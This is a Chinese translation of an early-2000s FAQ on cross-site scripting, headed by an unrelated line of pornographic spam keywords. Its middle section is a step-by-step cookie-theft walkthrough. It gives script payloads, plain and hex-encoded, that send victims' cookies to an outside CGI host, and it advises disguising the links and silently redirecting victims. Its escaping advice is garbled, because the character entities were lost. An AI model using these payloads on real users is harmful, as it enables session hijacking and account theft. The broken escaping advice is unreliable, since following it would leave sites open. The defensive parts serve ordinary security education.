免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版

該文章簡單地介紹了XSS的基礎(chǔ)知識及其危害和預(yù)防方法。Web開發(fā)人員的必讀。譯自 http://www.cgisecurity.com/articles/xss-faq.shtml。

簡介

現(xiàn)在的網(wǎng)站包含大量的動態(tài)內(nèi)容以提高用戶體驗，比過去要復(fù)雜得多。所謂動態(tài)內(nèi)容，就是根據(jù)用戶環(huán)境和需要，Web應(yīng)用程序能夠輸出相應(yīng)的內(nèi)容。動態(tài)站點會受到一種名為“跨站腳本攻擊”（Cross Site Scripting, 安全專家們通常將其所寫成 XSS）的威脅，而靜態(tài)站點則完全不受其影響。這篇FAQ將使你能更深入地理解這種威脅，并給出如何檢測并防止的建議。

什么是跨站腳本攻擊？

跨站腳本攻擊（也稱為XSS）指利用網(wǎng)站漏洞從用戶那里惡意盜取信息。用戶在瀏覽網(wǎng)站、使用即時通訊軟件、甚至在閱讀電子郵件時，通常會點擊其中的鏈接。攻擊者通過在鏈接中插入惡意代碼，就能夠盜取用戶信息。攻擊者通常會用十六進(jìn)制（或其他編碼方式）將鏈接編碼，以免用戶懷疑它的合法性。網(wǎng)站在接收到包含惡意代碼的請求之后會產(chǎn)成一個包含惡意代碼的頁面，而這個頁面看起來就像是那個網(wǎng)站應(yīng)當(dāng)生成的合法頁面一樣。許多流行的留言本和論壇程序允許用戶發(fā)表包含HTML和javascript的帖子。假設(shè)用戶甲發(fā)表了一篇包含惡意腳本的帖子，那么用戶乙在瀏覽這篇帖子時，惡意腳本就會執(zhí)行，盜取用戶乙的session信息。有關(guān)攻擊方法的詳細(xì)情況將在下面闡述。

XSS和CSS是什么意思？

人們經(jīng)常將跨站腳本攻擊(Cross Site Scripting)縮寫為CSS，但這會與層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆。因此有人將跨站腳本攻擊縮寫為XSS。如果你聽到有人說 “我發(fā)現(xiàn)了一個XSS漏洞”，顯然他是在說跨站腳本攻擊。

跨站腳本攻擊有什么危害？

為了搜集用戶信息，攻擊者通常會在有漏洞的程序中插入 JavaScript、VBScript、 ActiveX或Flash以欺騙用戶（詳見下文）。一旦得手，他們可以盜取用戶帳戶，修改用戶設(shè)置，盜取/污染cookie，做虛假廣告等。每天都有大量的XSS攻擊的惡意代碼出現(xiàn)。 Brett Moore的下面這篇文章詳細(xì)地闡述了“拒絕服務(wù)攻擊”以及用戶僅僅閱讀一篇文章就會受到的“自動攻擊”。

• http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0311.html

能否給出幾個跨站腳本攻擊的例子？

著名的PHPnuke程序有很多XSS漏洞。由于該程序十分流行，因此經(jīng)常被黑客們作為XSS的攻擊對象進(jìn)行檢查。下面給出了幾個已公開報告的攻擊方法。

• http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
• http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
• http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

能否解釋一下XSS cookie盜竊是什么意思？

根據(jù)作為攻擊對象的Web程序，下面某些變量和插入位置可能需要進(jìn)行調(diào)整。要注意這只是攻擊方法的一個例子。在這個例子中，我們將利用腳本“a.php”中的 “viriable”變量中的跨站腳本漏洞，通過正常請求進(jìn)行攻擊。這是跨站腳本攻擊最常見的形式。

第一步: 鎖定目標(biāo)

當(dāng)你找到某個Web程序存在XSS漏洞之后，檢查一下它是否設(shè)置了cookie。如果在該網(wǎng)站的任何地方設(shè)置了cookie，那么就可以從用戶那里盜取它。

第二步: 測試

不同的攻擊方式將產(chǎn)生不同的XSS漏洞，所以應(yīng)適當(dāng)進(jìn)行測試以使得輸出結(jié)果看起來像是正常的。某些惡意腳本插入之后會破壞輸出的頁面。（為欺騙用戶，輸出結(jié)果非常重要，因此攻擊者有必要調(diào)整攻擊代碼使輸出看起來正常。）

下一步你需要在鏈接至包含XSS漏洞的頁面的URL中插入 Javascript（或其他客戶端腳本）。下面列出了一些經(jīng)常用于測試XSS漏洞的鏈接。當(dāng)用戶點擊這些鏈接時，用戶的cookie獎被發(fā)送到 www.cgisecurity.com/cgi-bin/cookie.cgi 并被顯示。如果你看到顯示結(jié)果中包含了cookie信息，說明可能可以劫持該用戶的賬戶。

盜取Cookie的Javascript示例。使用方法如下。

ASCII用法

 http://host/a.php?variable="><script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script> 

十六進(jìn)制用法

 http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

注意: 每種用法都先寫為ASCII，再寫成十六進(jìn)制以便復(fù)制粘貼。

 1. "><script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?‘ +document.cookie</script>HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e2. <script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?‘ +document.cookie</script>HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e3. ><script>document.location=‘http://www.cgisecurity.com/cgi-bin/cookie.cgi?‘ +document.cookie</script>HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

第三步: 執(zhí)行XSS

將做好的URL通過電子郵件或其他方式發(fā)送出去。注意如果你直接將URL發(fā)送給其他人（通過電子郵件、即時通訊軟件或其他方式），你應(yīng)當(dāng)將其進(jìn)行十六進(jìn)制編碼，因為這些URL一眼便可看出包含惡意代碼，但經(jīng)過十六進(jìn)制編碼之后就可以欺騙大部分人。

第四步: 處理收集到的信息

一旦用戶點擊了你的URL，相應(yīng)數(shù)據(jù)就會被發(fā)送到你的CGI腳本中。這樣你就獲得了 cookie信息，然后你可以利用Websleuth之類的工具來檢查是否能盜取那個賬戶。

在上面的例子中，我們僅僅將用戶帶到了 cookie.cgi頁面上。如果你有時間，你可以在CGI中將用戶重定向到原來的頁面上，即可在用戶不知不覺之中盜取信息。

某些電子郵件程序在打開附件時會自動執(zhí)行附件中的Javascript代碼。即使像Hotmail這樣的大型網(wǎng)站也是如此，不過它對附件內(nèi)容作了許多過濾以避免cookie被盜。

作為網(wǎng)站管理者應(yīng)當(dāng)如何防范？

這個問題很簡單。堅決不要相信任何用戶輸入并過濾所有特殊字符。這樣既可消滅絕大部分的XSS攻擊。另一個建議是輸出頁面時將 < 和 > 變換成 < 和 >。要記住，XSS漏洞極具破壞性，一旦被利用，它會給你的事業(yè)帶來極大的損害。攻擊者會將這些漏洞公之于眾，這會在用戶隱私的問題上大大降低你的網(wǎng)站的用戶信賴度。當(dāng)然，僅僅將 ( 和 ) 變換成 < 和 > 是不夠的，最好將 ( 和 ) 變換成 ( 和 )，# 和 & 變換成 # 和 &。

作為用戶應(yīng)當(dāng)如何防范？

保護(hù)自己的最好方法就是僅點擊你想訪問的那個網(wǎng)站上的鏈接。例如，如果你訪問了一個網(wǎng)站，該網(wǎng)站有一個鏈接指向了 CNN，那么不要單擊該鏈接，而是訪問 CNN 的主站點并使用搜索引擎查找相關(guān)內(nèi)容。這樣可以杜絕90%以上的XSS攻擊。有時候XSS會在你打開電子郵件、打開附件、閱讀留言板、閱讀論壇時自動進(jìn)行。當(dāng)你打開電子郵件或是在公共論壇上閱讀你不認(rèn)識的人的帖子時一定要注意。最好的解決辦法就是關(guān)閉瀏覽器的 Javascript 功能。在IE中可以將安全級別設(shè)置為最高，可以防止cookie被盜。

XSS漏洞有多常見？

由于XSS漏洞很容易在大型網(wǎng)站中發(fā)現(xiàn)，在黑客圈內(nèi)它非常流行。FBI.gov、CNN.com、Time.com、Ebay、 Yahoo、Apple、Microsoft、Zdnet、Wired、Newsbytes都有這樣那樣的XSS漏洞。

在商業(yè)產(chǎn)品中，平均每個月能夠發(fā)現(xiàn)10-25個XSS漏洞。

加密能否防止XSS攻擊？

使用SSL(https)加密的網(wǎng)站并不比不加密的網(wǎng)站好到哪兒去。Web程序仍然以同樣的方式工作，只是攻擊是通過加密的連接實現(xiàn)。有些人看到瀏覽器上的鎖圖標(biāo)就認(rèn)為他們是安全的，其實不然。

XSS漏洞能否在服務(wù)器上執(zhí)行命令？

XSS漏洞會導(dǎo)致Javascript的惡意插入，但它的執(zhí)行受到很多限制。如果攻擊者利用瀏覽器的漏洞，有可能在用戶的計算機上執(zhí)行命令。因此，就算能夠執(zhí)行命令也只能在客戶端。簡單地說，XSS漏洞可以觸發(fā)客戶端的其他漏洞。

如果我不修改CSS/XSS漏洞會怎樣？

如果不修改XSS漏洞，你的網(wǎng)站上的用戶會受到被篡改的威脅。許多大型網(wǎng)站都發(fā)現(xiàn)了XSS漏洞，這個問題已經(jīng)得到普遍認(rèn)識。如果不修改，發(fā)現(xiàn)它的人也許會警告你的公司，損害公司的信譽。你拒絕修改漏洞的消息也會傳到客戶那里，造成公司的信任危機?？蛻舨恍湃蔚脑掃€怎么做生意？

介紹一些更深入講解XSS的地方。

"Cross-site scripting tears holes in Net security"
http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm

Article on XSS holes
http://www.perl.com/pub/a/2002/02/20/css.html

"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"
http://www.cert.org/advisories/CA-2000-02.html

Paper on Removing Meta-characters from User Supplied Data in CGI Scripts.
http://www.cert.org/tech_tips/cgi_metacharacters.html

Paper on Microsoft‘s Passport System
http://eyeonsecurity.net/papers/passporthijack.html

Paper on Cookie Theft
http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies

The webappsec mailing list (Visit www.securityfocus for details)
webappsec@securityfocus.com

Many Thanks to David Endler for reviewing this document.

Published to the Public May 2002
Copyright May 2002 Cgisecurity.com